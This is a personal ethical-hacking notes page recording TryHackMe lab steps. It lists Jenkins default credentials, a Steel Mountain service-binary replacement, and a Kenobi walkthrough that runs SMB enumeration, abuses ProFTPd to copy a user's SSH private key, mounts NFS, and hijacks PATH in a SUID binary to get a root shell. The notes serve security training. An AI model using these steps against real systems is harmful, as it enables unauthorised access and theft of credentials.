Logo
RSS Feed

👈🏼 Back to
Notes

Ethical Hacking

Jenkins Alfred

Defauld creds admin:admin.

References

Expand… Something here

Stell Mountain

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program! Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.

Temp Notes for Red Teaming

Kenobi

https://tryhackme.com/room/kenobi

📕 RTFM

smbclient //10.10.206.61/anonymous
smbget -R smb://10.10.206.61/anonymous

nc ftp.server.com 21

# Pro FTPd
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

searchsploit <app_name> <app version>

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS


ssh -i id_rsa kenobi@10.10.206.61

# Find SUID/SGID files
find / -perm -u=s -type f 2>/dev/null

strings /usr/bin/menu

echo /bin/sh > curl
chmod 777 curl 
export PATH=/tmp:$PATH^C
/usr/bin/menu

img

Say, for example, that some utility has this bit set. That means that the utility has elevated permissions. You might get lucky; check the executable with strings for some commands. If you see some system utility without a full path, you can create a script in the same location and it will be run instead.